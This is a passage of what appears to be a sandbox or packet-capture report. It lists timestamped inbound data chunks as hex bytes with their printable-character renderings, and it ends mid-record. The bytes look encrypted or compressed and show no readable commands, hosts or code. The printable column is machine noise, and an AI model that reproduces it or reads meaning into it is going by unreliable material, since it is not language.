74 3d 1e f6 fa fa 8f 5f c7 57 1f 53 29 08 e7 5d fc 8d 47 5b 08 57 8c be 85 76 87 d9 15 91 bc 13 b7 ea fd 75 69 09 1b 11 78 5a a4 df 7e a6 ba f1 Data Ascii: 2F#~3>IkLeBX8U+H9/t-k<,]Q?.E-snnZ0lfr+;bG1M^x]S^N!@#PS)J\|pnfcQRqmYLn\SUo@\|w,2,WS50vs}t=_WS)]G[WvuixZ~
2021-12-01 12:26:35 UTC	160	IN	Data Raw: 66 ac 18 d3 f7 c0 27 4e dd b6 a7 d6 18 ed 14 9e 15 df 4d 16 d0 df 64 0a 2d bb b1 7c 63 94 e5 79 d3 b7 06 ea 4d 13 e2 86 88 c5 a5 87 2d bc 9c 0d ff 8b 6f 28 4c d1 6e 03 13 c1 ea 0f 0d e5 1f 50 e4 26 25 d5 c2 87 34 29 83 91 b0 d5 e5 c1 f7 71 b6 53 bb 76 d3 8d ad ad b6 79 e0 b1 23 6a 25 4f 71 48 53 64 22 70 c0 fe a4 9a c7 73 aa 8b 11 55 2a 73 fd 9b 9d ba 9d 82 52 cc 6b ca 09 4e ad a8 bd b3 08 20 35 96 62 28 6c bc a7 dc a7 16 bd 72 9c df d4 54 aa 82 3a 25 50 47 db 7a ae 8c e4 7c 0e 2a 8d 4b 99 22 b1 36 f3 1a 48 a9 ad ac 7d da 06 b1 44 eb cd 35 dd 93 36 91 6c 81 2f 84 42 00 8f 7a 73 cd 50 df 19 c6 7e bc 9c e0 26 ce 93 a3 8c 28 f7 11 f4 51 b1 c2 0e ef 01 74 59 28 e0 27 33 d2 9f f5 ef 3c ff 38 79 7e 76 cf 56 63 72 81 3e a2 29 17 62 e6 2a 8b d9 20 df 41 7f 77 45 Data Ascii: f'NMd-\|cyM-o(LnP&%4)qSvy#j%OqHSd"psUsRkN 5b(lrT:%PGz\|K"6H}D56l/BzsP~&(QtY('3<8y~vVcr>)b* AwE
2021-12-01 12:26:35 UTC	161	IN	Data Raw: fc da b2 be 97 a2 86 ba 15 56 a1 5d 06 b5 8c 1c fe 58 57 45 f6 a4 f3 cc 56 df 38 73 b6 46 35 1f b2 2f a6 07 b6 00 04 03 6d a8 66 a2 bb 8f 0a 21 32 1d 5f af 7c 14 40 fd 59 40 02 a6 f2 69 77 1a 73 77 cf 45 c2 e8 71 63 5d 0a 9e df 98 93 80 14 9f fa f0 2b 34 f6 10 f9 6d a7 7d 21 75 7e 0d be c8 38 fb 6d 95 15 15 1d ae 00 47 8e 92 e1 fc a7 f8 13 7f 62 56 dc 1e 8b ed 6c 56 33 de 55 f6 d0 2f 3a 35 76 f8 c2 f0 7a ec c6 41 cb ab 1d f6 a5 e0 75 6a 5f 26 60 30 5a b4 eb 53 95 d2 c6 c6 00 07 8a d7 75 93 0f 61 58 e2 26 fd 3a 92 d3 5d 0a 38 7d 8e 67 bc c9 17 1b 91 63 18 36 41 9c 86 63 d9 15 4e a7 13 6b e0 9b 36 06 71 5f 60 83 f4 dd 7a b1 5c 25 40 71 79 b4 57 65 e2 3d f5 da 26 d3 26 d9 4a bb 6c 01 f4 52 01 cd a8 d2 b2 01 2b b7 04 53 59 4f b4 17 df 06 07 e5 e4 d8 26 ec bd Data Ascii: V]XWEV8sF5/mf!2_\|@Y@iwswEqc]+4m}!u~8mGbVlV3U/:5vzAuj_&`0ZSuaX&:]8}gc6AcNk6q_`z\%@qyWe=&&JlR+SYO&
2021-12-01 12:26:35 UTC	162	IN	Data Raw: 92 a1 8d f6 d4 00 9f 28 c6 89 fb 86 5d 4c 79 e4 01 03 e2 d4 a3 7d 68 aa 93 bd 29 70 75 e6 65 11 7a 63 92 3f ee 90 47 30 a1 86 f4 bf 68 b6 2c 54 35 8c 2e 63 9e b1 f7 22 dc 26 4b 16 1b 69 2a 28 90 dc f7 e6 39 f0 5d 74 53 13 73 9b a8 a1 be b1 38 64 77 82 0f 72 59 73 21 5a 3f 79 59 87 38 43 bf 1a 2c ec ce f6 bc f2 fb c7 cb cf e2 48 1f fa 05 3f c1 e8 59 bb 3e 1f 06 86 e1 83 a6 2f 91 75 22 f1 1f 7c 41 aa 2a b9 1b b4 46 5b 10 62 bb 65 eb a9 b8 40 63 7d 34 19 b1 cd ea bc 0c 97 8b 9a 32 67 f4 fd 94 bf a3 51 b8 1e 70 96 aa 8e c9 44 41 77 55 7d ce 56 3e 21 e5 c8 07 e6 3d 99 65 ee a3 93 90 d7 69 09 d1 78 b9 5d df ea d2 68 de 85 57 65 36 28 61 32 c1 f3 d8 ef 3f a7 3e 1b 76 1a 3a 94 1e bd d1 36 2b 77 33 f8 dd e2 3f da e5 30 a7 89 21 9f 9a dc 4a 6a 58 21 37 7b 5c d1 d1 Data Ascii: (]Ly}h)puezc?G0h,T5.c"&Ki(9]tSs8dwrYs!Z?yY8C,H?Y>/u"\|AF[be@c}42gQpDAwU}V>!=eix]hWe6(a2?>v:6+w3?0!JjX!7{\
2021-12-01 12:26:35 UTC	163	IN	Data Raw: 58 2f 9d 0a 75 2a 79 c4 c0 2c 1c 54 dd 87 80 92 28 82 24 a9 33 d2 ba 63 02 0f aa ff c9 ec 76 b9 b7 fc 3f 65 1b 74 d2 92 ee 2e 59 5d 46 17 7b 5e d6 75 4e 53 54 24 e7 9c ef c3 e2 8b 9d 7b 4b 88 de 17 c0 b1 0e c3 f2 68 4a 3d 83 8e 2b 85 10 61 24 9c 17 2a 58 cb 35 e0 7c b4 2c 36 29 6f 7b db ea df a1 fd e1 3f d3 db b8 32 50 63 20 50 08 3b 26 56 a2 99 e3 cb 60 15 0e 0c 35 13 92 fb f3 78 ba 78 14 b2 5c 43 b7 20 b0 f3 ab de 9e 31 1e a2 3f f8 39 57 3f 2d 97 13 a3 f8 49 df 10 10 9d 41 b8 3e ba 31 45 e9 df 70 c9 3a f6 69 b0 a0 41 bf ed b7 79 81 13 36 11 9c 88 43 b7 e9 64 07 1f f0 64 f8 24 c3 f9 46 39 aa 25 5d 3b 93 7b 8c cd f9 27 93 9c 97 dd 6e bf 34 85 01 98 bc 78 5a 27 5d 7c 9d cd fd 14 d4 80 54 e8 23 dd 32 2d a6 6d ef 71 73 4a 8c 11 92 18 08 7e c7 31 d7 eb 08 f9 Data Ascii: X/uy,T($3cv?et.Y]F{^uNST${KhJ=+a$X5\|,6)o{?2Pc P;&V`5xx\C 1?9W?-IA>1Ep:iAy6Cdd$F9%];{'n4xZ']\|T#2-mqsJ~1
2021-12-01 12:26:35 UTC	164	IN	Data Raw: b4 a5 64 43 3e 81 76 77 51 00 51 b2 c4 0b 74 80 f7 5b 76 d8 25 88 88 e1 21 90 25 95 a3 3a d6 89 5a 7f c8 f2 0d e8 16 60 00 38 e3 a8 df 0b cc 09 0c 25 f1 c2 ce 75 ae 89 89 b6 fa 51 fa 5c d9 79 2c 39 ab 10 f8 60 1d f0 4a 64 db f6 d2 84 16 00 28 d4 0c 0f 02 64 60 be b6 6d 96 5a f1 1e 85 0c e3 65 a2 a3 60 b8 57 b7 25 b7 81 bc 19 64 fd a4 04 48 4e 19 40 ff 82 83 e4 24 aa e9 59 ba 51 7a 95 1e bc 74 35 2b 77 2e f4 02 e2 8d ad d4 1e 97 a7 de b8 a9 ed 6e 6a bb 21 83 7e 59 b1 d1 68 44 e9 fd ff 20 48 03 a6 a7 f6 67 02 28 c7 b5 bd 12 bb fc 70 c8 15 e4 ae 55 9d f1 38 23 a0 21 3b 3e 59 68 c5 94 c3 10 5e b4 1b 6a f2 df 61 51 28 bf 78 32 e3 d5 63 e3 4d 6f 41 62 23 ae 52 b1 cc bc 94 c3 07 f4 05 2f 61 db 49 3b c7 7d 27 4d 81 ed ca 39 1b 0e 35 60 7e 4d a2 06 dc cb 1d 0e 0a Data Ascii: dC>vwQQt[v%!%:Z`8%uQ\y,9`Jd(d`mZe`W%dHN@$YQzt5+w.nj!~YhD Hg(pU8#!;>Yh^jaQ(x2cMoAb#R/aI;}'M95`~M
2021-12-01 12:26:35 UTC	166	IN	Data Raw: c6 ac ca f0 c1 bb ac 2a e1 4c 63 15 5b 18 e5 33 1e 9d 90 f0 c8 43 21 20 30 25 72 a2 21 40 78 2f fc 05 0b ed 49 2f 84 99 29 67 d4 0b 17 14 78 ab d4 29 c5 2e 94 6e 3f b3 ec 66 66 c2 39 8d 2a ae 87 37 14 55 64 d2 01 75 31 e6 65 a3 19 a7 b9 ff b8 66 81 e0 90 03 87 ac 43 f9 d6 69 fa 0b f8 c6 e2 29 6f e5 4e 2f 8c 36 e1 27 9b 83 8b c0 c3 07 9b 8d 9b d0 71 ae 3c 09 04 8b 9d 57 cc 98 76 37 09 c0 6b 39 da 90 fc c0 2b 99 22 3b 5b 6d dd de 6b 59 91 48 26 bc 0f 3e f3 47 26 e0 09 b9 4c 07 d7 b2 49 ae b0 08 9c 7b 6f cc ad 36 93 e7 0e 1d 3b ee 6e 50 e3 0a 5f 44 0b ac b4 cf 6e 67 6d e5 86 79 40 48 c8 f9 85 1f 8d 5b 8e 81 3b 03 f4 d8 b2 d1 f5 df 1b 85 23 8c b3 29 e1 8c 7b d9 68 d7 3b 10 cb 21 b9 46 9f 85 1a 54 be 36 46 57 06 3d 94 bf 5a 3e 61 d7 60 52 eb 1d 59 0e 6c 5b 4f Data Ascii: Lc[3C! 0%r!@x/I/)gx).n?ff97Udu1efCi)oN/6'q<Wv7k9+";[mkYH&>G&LI{o6;nP_Dngmy@H[;#){h;!FT6FW=Z>a`RYl[O
2021-12-01 12:26:35 UTC	167	IN	Data Raw: f0 a5 07 fc be 44 ce 70 37 16 bd 0c 9f ab ba 13 4d 5b 35 16 33 51 82 f1 15 fc be 15 22 45 54 c3 9e 4a d0 23 07 21 b3 39 da f7 13 fa 51 76 95 b2 3e f9 29 16 7a 7f 74 77 b7 e0 5e a4 fd 3e 2b dc e9 ea 11 1e 6d 6f 1c e2 49 55 a8 b9 6c b1 3e ed 7d 81 24 00 73 f9 d7 7e e4 2d 16 f2 a1 26 3c 4e b6 c3 29 5e 14 4c b6 4d e2 7e de 52 7c 7c c9 6e 8e d1 fb 34 63 89 2d 76 4e 75 2f 1c 4c ff 2b c3 41 f1 f5 36 d8 28 5b 84 21 f4 5b 70 76 e8 ed f8 15 4d 19 cf 69 4d 60 a6 10 4a 16 8c 11 0c 50 63 38 10 d6 1e 43 8e 46 f5 f7 52 e1 e6 a5 13 e1 43 3b ca f0 a2 d9 5a 94 39 a1 df 2c 71 9e eb da 5e 06 2a 89 83 b6 6e c7 98 ae 89 fc 95 db be 8a 48 65 a6 af f3 2e 22 23 f7 17 99 3b 59 e7 41 cb 0d 17 44 4b cf 29 3e 28 1e db 06 27 c8 a3 8b 1e 17 c8 fd da d0 a4 6d 30 10 cb 10 64 4e 9f 60 48 Data Ascii: Dp7M[53Q"ETJ#!9Qv>)ztw^>+moIUl>}$s~-&<N)^LM~R\|\|n4c-vNu/L+A6([![pvMiM`JPc8CFRC;Z9,q^*nHe."#;YADK)>('m0dN`H
2021-12-01 12:26:35 UTC	168	IN	Data Raw: 24 6d e4 ce 10 a9 05 74 27 4a 5a 92 cd c1 06 9b b5 05 dd 62 8f ab ad d1 90 93 56 cc 20 57 7c 8b c1 7a 33 51 81 21 c9 27 f4 2c 2d 45 6b 5b 42 7c 6a 04 1f 43 23 02 7e ed 11 a6 f6 8e f9 44 71 c0 77 a3 e6 a2 5e 1c 37 68 8c 33 30 83 5b 9f 0f c3 b0 e0 c7 e2 4e 41 12 0b ba a5 ab e7 60 6f 70 90 6a 42 1e 48 6e 04 57 85 2d 99 96 37 42 fa 8e 32 15 f4 97 85 d3 b5 e0 23 60 ef d3 eb 2f d5 c1 25 16 cd bd ae 55 8b d4 3d cb ae 7b fc 5e 86 2b 93 f2 55 68 03 06 87 1d e4 4b 89 22 6b 16 51 ee b1 ad 0f d5 3f 39 d4 3e 46 cf e5 e1 00 2c a5 79 af b9 00 bd ea f4 b3 d6 2f ef ba c5 a1 70 6d 64 b2 36 2f c4 ce e5 58 11 b3 a7 6f ee d4 86 40 aa c0 96 7a 31 f0 3a 58 94 c6 6b c5 28 e8 bf 6c e1 0d 97 57 f2 bd 62 77 29 6d 2b 99 aa ea fc b3 e7 e5 7e 3d 1b 05 d6 95 a8 33 9e ea 8b 17 29 49 48 Data Ascii: $mt'JZbV W\|z3Q!',-Ek[B\|jC#~Dqw^7h30[NA`opjBHnW-7B2#`/%U={^+UhK"kQ?9>F,y/pmd6/Xo@z1:Xk(lWbw)m+~=3)IH
2021-12-01 12:26:35 UTC	170	IN	Data Raw: c5 0f c2 04 57 23 1a 3d e6 fa 61 80 bd 49 78 a9 e2 c1 6a f5 4a 73 4a 47 23 47 c7 4b cc 07 95 c0 07 63 04 88 71 fe 49 96 5e 77 26 f6 80 e9 cb ae 1a 8a 34 45 7e 78 3a 10 dd 17 1c 48 08 78 e0 2a 22 f1 18 43 98 41 c7 f6 54 e7 3a 8a 04 12 47 1e 86 f7 90 db 5c 97 cf e6 ee 48 7c 30 73 fe 20 19 2c 89 14 b4 57 83 9d f2 94 ea a3 fc b8 8a 85 62 94 ae f5 68 b6 49 6c b1 90 1e ce e6 73 c9 0b 14 52 4a e5 05 1d d9 d8 ff 34 25 ce a3 c7 1a 25 8c f8 bc 4c 0b 1c 0a 16 cb 87 65 77 9e 66 0e 50 f0 05 8e e4 90 e7 51 ab 27 f7 96 1b de 75 34 cb 40 64 0c 9d e6 57 93 63 c1 c0 ec 05 4e cb 70 82 83 08 d8 20 af 33 05 ba 9c 1b 63 a1 38 ee 5f 71 b3 b7 5c 36 f0 1c 38 d1 60 d1 48 70 6a 46 12 64 59 fd 64 4e dd 73 48 c7 f2 e0 45 c8 f2 2a 69 4b ff ed 01 f3 97 2b 48 da 4a 61 8f a1 9b 34 3c 0a Data Ascii: W#=aIxjJsJG#GKcqI^w&4E~x:Hx"CAT:G\H\|0s ,WbhIlsRJ4%%LewfPQ'u4@dWcNp 3c8_q\68`HpjFdYdNsHEiK+HJa4<
2021-12-01 12:26:35 UTC	171	IN	Data Raw: 42 0d 48 95 8d 47 98 27 0e 3f 39 4a ea 8e 32 06 f4 81 02 65 a7 ea b4 99 fa db fb 2f 69 8c 25 d2 cc 0b bb 7f 9d 4b 9c c2 bf 7b 58 12 86 99 96 02 55 42 e1 9f 6b 1e f5 4b d9 51 6b 0d 60 1e b1 87 12 56 cb 3a c5 3e 46 bd e5 76 01 96 bc 53 4a 7f 92 bc fb f4 2f a7 2f 78 bb 59 b4 5a 3c 7f ce 3e 3e c4 ea 95 58 5d b4 e7 64 c4 f6 c1 3c a2 d1 96 a2 41 f0 36 5e 64 c6 41 52 19 79 b7 7d e1 89 ef 57 6d bf b9 64 03 fa 6a d8 a8 fb fc 93 98 e5 32 3a 8c 09 fc 02 11 c7 96 fb 8b 6b 4b 49 7e 57 19 a7 ad 7d d6 9b 82 86 dd dc 84 fd 10 0e 74 c1 56 b5 d6 7f 42 3e 16 77 64 51 f0 62 8f d5 af 75 0b ea 5a 76 ce 22 9b 88 ee 37 84 27 31 a2 71 ca 88 5a bb c9 e1 0d 0e 15 c1 08 9c e2 56 c2 0a cc 58 0f 36 f1 e9 c8 52 bf 2d 88 88 d9 50 fa cb d8 6a 2c fc af 71 fc da 1c 8a 6f 61 db e0 d5 97 16 Data Ascii: BHG'?9J2e/i%K{XUBkKQk`V:>FvSJ//xYZ<>>X]d<A6^dARy}Wmdj2:kKI~W}tVB>wdQbuZv"7'1qZVX6R-Pj,qoa
2021-12-01 12:26:35 UTC	172	IN	Data Raw: 81 f8 ba 1e c4 d2 ae 2b b8 ad d9 b8 8a 83 6a 6d a0 35 2e f9 22 a7 49 9e 3b ce e6 75 c1 e8 1e 1b 4d b0 2b cc 6b db da 34 25 c8 ab 37 10 e5 ca b6 da 47 e1 12 2f 16 cb 81 6d 4e b0 43 4c 1d ac 3a db ea b5 e7 51 ad 2f bc b8 e5 99 38 5f 80 bf 6a 29 9d e6 51 9b 1f ca e5 ee 52 60 9a c5 81 a6 08 d8 26 a7 bb 0e 44 db 57 05 2a be e0 7a 71 b3 b1 54 19 c7 32 7f 82 3c 6e c3 7e 4f 46 12 62 51 c1 53 d6 98 20 23 0c ca ee 60 c8 ad b6 61 8b ea c8 14 ba a3 fa 8a db 6f 61 3b 85 93 fa 29 f4 66 75 25 09 d6 43 cd 35 be 75 05 2d 3a 0c f1 34 25 d6 88 a0 c8 f1 c1 dd a8 8f e2 b3 62 72 56 48 a2 33 1e 92 9f e5 c2 d1 2e 13 1b 66 70 d7 64 da 7e ba e1 02 03 e4 5a 2f 9a cb 29 03 8d 9f 0a 15 78 11 f6 93 e6 9e 90 d9 15 17 ab 66 66 0a 16 9b 20 1a a6 1c 33 11 66 13 44 d5 3c f6 67 a4 11 40 a8 Data Ascii: +jm5."I;uM+k4%7G/mNCL:Q/8_j)QR`&DW*zqT2<n~OFbQS #`aoa;)fu%C5u-:4%brVH3.fpd~Z/)xff 3fD<g@
2021-12-01 12:26:35 UTC	173	IN	Data Raw: c3 f9 86 29 11 7f 21 7f ee f6 91 2f bb ff b3 81 71 81 3a 78 13 d6 6b 52 29 68 ae 53 c4 a0 df 26 f2 c9 e5 67 29 fa 2a c1 b1 d5 d9 c3 a8 94 7e 71 93 12 d6 02 a9 df 97 6c 8a 78 58 38 48 7b 48 a4 87 7d ee 80 83 90 da cf 97 8c d9 40 32 da 7c b5 ae 74 43 a9 17 01 54 20 71 f3 f4 c5 85 75 8b e0 5b e1 cf b4 ab f9 90 97 7d 25 1b a2 31 d1 91 74 9e da f2 7c 99 9c 3d 01 b6 e2 aa b9 08 5b 59 8f 04 80 df 2e 2e af 07 88 b4 fc 49 d4 ee cb 79 5d b0 b3 4a f9 f0 1c f2 2c 63 ab f0 c6 84 67 1d 02 8e 0d 9c 03 66 24 bd 21 4e 7f 5b 80 03 bd 56 e2 f2 a3 01 71 a0 63 e9 a0 b7 f0 bc b5 3e fc 3a 05 4a 58 19 d7 b2 be a7 95 39 aa b0 58 25 50 78 83 1e 2b d0 07 0f 06 33 58 53 e3 3f ac d1 08 97 30 13 ec 8d 9f 73 0e d7 20 37 7f 5c a7 d1 ff aa b4 d9 8b 3d 5c 7d a7 1e f7 65 15 28 50 79 d5 36 Data Ascii: )!/q:xkR)hS&g)*~qlxX8H{H}@2\|tCT qu[}%1t\|=[Y..Iy]J,cgf$!N[Vqc>:JX9X%Px+3XS?0s 7\=\}e(Py6
2021-12-01 12:26:35 UTC	175	IN	Data Raw: 20 d2 33 16 64 db 18 05 aa ec e1 ed 70 a3 bc 21 36 37 c2 7f d2 3c da 91 7f d8 47 a4 60 24 fd f7 91 9a 70 23 cc 98 ef f7 c9 f3 bb 14 4b 13 32 11 eb a3 0e d8 da 79 66 cf 88 e6 34 0c ea 66 24 25 09 85 42 db 32 e0 78 70 36 5c c9 f4 66 25 e2 dc a1 5f f0 6a f1 dd ba a0 ac 62 20 56 08 f6 32 89 93 54 c9 b7 42 25 df 1b 35 70 a3 37 db 68 bd f1 0f 76 46 c5 5c 98 98 29 83 de 9e ce 14 f3 07 83 39 97 c3 95 8d 15 a3 f8 67 f1 0b 68 b6 55 af 53 50 36 45 66 d3 17 d4 2a f1 19 89 64 5b 00 cd ba 67 81 13 9f 0b ab 88 50 b7 86 64 a8 f9 f9 4d ea 24 7b e4 d9 11 60 0e 9e 26 4f a6 9f cd c1 06 8d b5 12 dc 83 84 41 ac 3f 6e 9e 56 cc 20 41 7c 1d c6 61 3f bb 80 76 36 2a f4 2c 2d 43 73 f5 67 4e 69 ee 1e 06 dc 0f 7e ed 11 a0 ee 20 dc 03 7d 2a 76 d0 16 af 5e 1c 37 0e 8f c3 20 86 7b 75 0e Data Ascii: 3dp!67<G`$p#K2yf4f$%B2xp6\f%_jb V2TB%5p7hvF\)9ghUSP6Efd[gPdM${`&OA?nV A\|a?v6,-CsgNi~ }*v^7 {u
2021-12-01 12:26:35 UTC	176	IN	Data Raw: 76 52 20 8a 88 90 23 c9 25 ad a0 d7 d5 f4 5a 0c cb f0 0d 99 14 27 00 dd f6 4c dd 76 cc 8a 0d 27 f1 df ce 34 ae e7 8a 52 f8 2c fa 25 da 7b 2c b0 a8 51 f8 65 08 14 48 1d db ea d6 86 16 1d 28 95 0c 96 00 80 62 c3 b6 69 82 58 f1 03 85 4d e3 0b b6 e7 62 c5 57 8e 25 b5 81 bc 19 25 fd 04 06 ac 4c 64 40 ee 96 81 e4 39 aa a8 59 d9 46 9e 97 63 bc a9 35 29 77 33 f4 4b e2 57 af 37 1c ea a7 86 ac ab ed 73 6a ce 21 0e 68 ba b3 ac 68 04 e9 ff ff 3d 48 7b a6 8c f4 83 01 55 c7 b3 a7 10 bb fd 72 b0 15 3c b8 b1 9e 8c 38 dd a7 23 3b 3f 5b 0c c5 f3 c1 f4 5d c9 1b 60 ed dd 61 50 2a df 78 23 fa 31 60 9e 4d 32 41 60 23 af 50 dd cc 01 91 27 05 89 05 ce 7a d9 49 26 c7 e1 26 80 9a 09 c9 44 1b cf 30 62 7e 4c a0 86 dd 27 18 ea 08 2d f4 48 26 d6 18 43 98 d7 c7 c0 4f 07 20 d9 21 6e 41 Data Ascii: vR #%Z'Lv'4R,%{,QeH(biXMbW%%Ld@9YFc5)w3KW7sj!hh=H{Ur<8#;?[]`aP*x#1`M2A`#P'zI&&D0b~L'-H&CO !nA
2021-12-01 12:26:35 UTC	177	IN	Data Raw: 92 e1 ca 42 21 ab 1a e0 44 45 23 a6 7e dd ec 06 0b 46 55 21 99 c6 28 65 ca e3 0a 9c 75 15 fe 39 c7 b9 94 31 13 45 ec 1a 66 a0 1b 9f 28 af 87 36 37 f4 67 35 03 a9 3c 3a 6a a0 19 5b b4 79 ba 57 86 f5 9b 6e 85 43 4e b5 fb 64 f8 9c f8 ae eb c2 6f 99 4e 00 b6 27 e3 26 9b c4 9e ab c6 e0 99 c8 85 ec 7d ad 3c ac 0b 0e 9f 03 ce c6 55 01 0b 93 65 11 c6 80 fe 57 2b dc 24 cb 47 16 db 36 63 48 93 1e a6 bd 0e f2 ef f7 a4 8b 0e 6f 5c 53 57 76 48 78 ae 4b 16 d1 6a f1 b3 88 9b 79 08 0e 39 2e ee 7e e0 a8 43 6f 8b 60 bd 89 70 61 6b ef 80 04 56 f8 4a 13 84 ab 9d 0f 0e 97 3c dd ea 6d 30 f3 f6 ea 05 cd ac c2 b4 61 ff 4c fb b7 7d 79 27 6b cd 82 b0 57 9d d3 9a 55 bf 76 5b e7 84 56 93 92 4b 6a e1 13 61 89 f5 b7 cc a4 69 6b 51 6f af af 12 d6 d9 ad c5 7f 45 48 e7 9c 00 8e bb 7b 4a Data Ascii: B!DE#~FU!(eu91Ef(67g5<:j[yWnCNdoN'&}<UeW+$G6cHo\SWvHxKjy9.~Co`pakVJ<m0aL}y'kWUv[VKjaikQoEH{J
2021-12-01 12:26:35 UTC	178	IN	Data Raw: b4 40 0a a5 20 95 27 04 ba da 18 93 aa b3 e0 9c 73 ce b7 00 22 f1 1c 7e d2 aa da 20 79 a9 44 6f 64 27 e9 65 4e 9b 70 b5 cc 12 ee 86 ca d0 b0 c9 5f fd ed 10 eb 35 0e d5 dd 89 63 46 83 59 20 3e 0a 67 24 b3 09 5d 43 2b 37 c3 73 e9 22 26 29 f5 66 b3 e2 9c a6 2e f3 bc db a6 af fe 4d 63 20 c0 08 1c 33 f8 90 e2 e3 e2 57 23 3d 1a 35 e6 a3 f3 dc 98 b8 9c 04 41 53 57 b7 99 98 bf 83 bf 9c ec 17 05 17 92 2c c5 2f 94 8d 83 a3 ee 6d 80 08 6b 9d a6 ba 85 a0 37 45 f0 d3 a5 d6 da f4 1a a2 a9 4e b6 ef ba 67 17 13 a2 07 63 af 3e b7 29 71 fa 0a f8 4d 7c 24 a3 e6 a8 12 c5 25 17 33 99 52 9e cd 57 06 18 a1 63 df 0e af 2a ba 09 98 9f 56 5a 20 af 7e ed c3 16 13 fe 96 fc c1 2b f4 ba 2d a2 7e 3d 40 10 4a c9 08 a4 2b 0e 7e 7b 11 84 f5 e8 fb 2f 51 2b 60 4a ee ae 5e 8a 37 82 9a 55 32 Data Ascii: @ 's"~ yDod'eNp_5cFY >g$]C+7s"&)f.Mc 3W#=5ASW,/mk7ENgc>)qM\|$%3RWc*VZ ~+-~=@J+~{/Q+`J^7U2
2021-12-01 12:26:35 UTC	179	IN	Data Raw: 77 f6 f6 34 56 cc 22 88 88 06 23 bb 15 fd a0 4c d7 19 7a b9 c9 f2 0d 0f 14 14 05 50 e0 d7 df b9 ec 5a 0f 25 f1 49 ce ac 9f e1 8a c9 fa 85 da c9 d8 79 2c 26 a8 08 fd 16 1e 8f 4a 96 fb e2 d5 84 16 8b 28 3b 3d 7a 01 1b 60 a6 97 4d 81 5a f1 95 85 f2 e5 14 a1 7c 60 81 76 ce 26 b7 81 2a 19 be cf dc 07 37 4e 42 61 b1 95 83 e4 af aa 6d 5f c3 52 05 95 63 9d d3 36 2b 77 a5 f4 4d d0 d9 ae ac 1e 08 86 10 af a9 ed e5 6a 25 27 d1 7d 21 b1 11 49 a9 ea fd ff ab 48 1d 92 f8 f5 18 03 c9 e6 7a a4 12 bb 6b 72 6a 14 b9 ad 2a 9c f2 1a 38 a4 21 3b a9 5b 30 c3 c9 c0 6f 5f 91 39 60 e9 df 61 c6 2a d6 79 6f e0 aa 62 a4 6f 2e 45 62 23 39 50 55 cb e1 97 bc 07 9d 27 f6 7e db 49 b0 c7 a6 27 10 82 92 cb b2 39 9b 34 60 7e da a0 44 da f1 1e 71 0a fd d6 3b 22 d4 18 d5 98 bf c6 13 56 9c 22 Data Ascii: w4V"#LzPZ%Iy,&J(;=z`MZ\|`v&7NBam_Rc6+wMj%'}!IHzkrj8!;[0o_9`a*yobo.Eb#9PU'~I'94`~Dq;"V"
2021-12-01 12:26:35 UTC	180	IN	Data Raw: e7 82 32 90 9f e3 ca d4 21 aa 1e d3 72 de 21 0a 52 b8 e1 04 0b d0 55 9e b8 7e 2b fe c8 6c 26 17 78 17 fe af c7 ee 90 6b 17 de ee 73 4b 08 16 9d 28 39 87 fc 16 a3 64 ae 01 e2 11 f4 67 a2 19 cd b4 04 be 81 83 6e 99 4b a8 af 43 b7 fb f2 f8 cc d9 ab e8 59 6d 9e 63 12 b8 25 e3 b0 9b 4e 9b 2b c3 7b 9b 29 a8 df 73 af 3c 3a 0b 5f ba b0 ce 5d 57 c2 26 c3 6b 13 c6 16 fe 87 2e 12 2e 50 45 8b f6 40 6d 4a 93 88 a6 25 23 98 ef 6c a6 f7 20 fb 52 51 57 e0 48 9e ab b8 1e 4a 68 ae 9d 32 95 7b 08 98 39 5f de 21 e0 33 41 51 a5 b8 b3 8b 70 f7 6b d1 85 8c 40 63 48 0a aa 55 93 0d 0e 01 3c 5a db 68 30 68 f4 11 2b d1 a3 c0 b4 f7 ff 08 fe c9 6b e2 25 be e3 bf bf 55 9d 45 9a f8 8e 9d 5a 7c 86 e1 bd f0 44 68 e1 85 61 33 f3 ad db 3f 6b fd 7f ec a0 ad 12 40 d9 2b f7 d8 44 d3 e5 ec 2f Data Ascii: 2!r!RU~+l&xksK(9dgnKCYmc%N+{)s<:_]W&k..PE@mJ%#l RQWHJh2{9_!3AQpk@cHU<Zh0h+k%UEZ\|Dha3?k@+D/
2021-12-01 12:26:35 UTC	182	IN	Data Raw: 02 07 4a 4e 19 d6 b3 d0 94 02 3b d7 3e a5 1d 52 78 95 1e 2a d1 a8 28 91 31 89 dd ff 06 ae d1 1e 97 31 12 1c be 0b 71 17 58 1e 0e 7d 5c b1 d1 fe ab 02 fe 19 3f 35 ed c7 27 f5 65 03 28 51 78 8d 0b 5d ff 0f 26 97 66 ad 57 9c f1 ae 3a b6 25 dd 3d 26 9a 61 16 c0 12 5f b4 8d 62 54 c5 87 52 57 49 be b0 e0 d7 62 e3 db 2c 79 66 c5 ad 2d 4b 24 3e 97 c1 07 f4 93 f4 01 c0 af 24 ba 77 2c cc 82 ef cb 39 8d 99 44 64 98 4e dd 10 f6 2d 1e 0c 0a 50 62 39 2d f4 fe 41 e5 41 8b cf 56 e1 22 a4 b7 e3 df 3f 60 f5 ed db 31 ae cd a0 ed 2e e1 9e 53 fa c6 1b 51 89 9a 8d 55 c5 9e ae 09 fb 68 dd 5e 88 f8 62 24 97 f7 2e b5 22 f1 0a c0 1a 28 e4 0e c9 da 2d 50 4c fd 2b ae 28 34 de d2 27 b3 a3 35 23 27 ca fb da d1 a5 6f 0b f0 c9 fa 65 64 a6 64 48 53 ac 98 9f f4 b0 01 53 d6 27 c3 ae 19 98 Data Ascii: JN;>Rx*(11qX}\?5'e(Qx]&fW:%=&a_bTRWIb,yf-K$>$w,9DdN-Pb9-AAV"?`1.SQUh^b$."(-PL+(4'5#'oeddHSS'
2021-12-01 12:26:35 UTC	183	IN	Data Raw: 06 9b b5 13 dd eb ad da ae 76 98 b1 13 ce 20 57 7c 9d c1 75 18 20 82 83 c1 64 b1 2e 2d 45 6b 4d 42 a8 48 75 1c db 2b 7f 3b ef 11 a6 f6 98 f9 28 45 b1 74 35 ee 3c 1b 1e 37 68 8c 25 30 7a 79 ee 0c 44 b8 5a 82 e0 4e 41 12 1d ba 19 9f 96 63 16 79 56 2f 40 1e 48 6e 12 57 8a 0e e8 95 41 4b 12 cb 30 15 f4 97 93 d3 a8 d6 52 63 82 da e2 69 6b 9f 25 16 5b bd f2 56 7b d1 e7 c3 85 3d 5a 01 86 2b 05 f2 4f 7f 07 11 1c 1f ae 0d db 42 6b 16 c7 ee d7 ae f4 d4 a4 3b b9 78 44 ae e5 e1 96 2c fc 6e ac ad fb bd 65 b2 2d b4 2f ef 2c c5 11 73 da 65 a6 3f fe 82 e8 86 58 11 25 a7 c8 f9 10 93 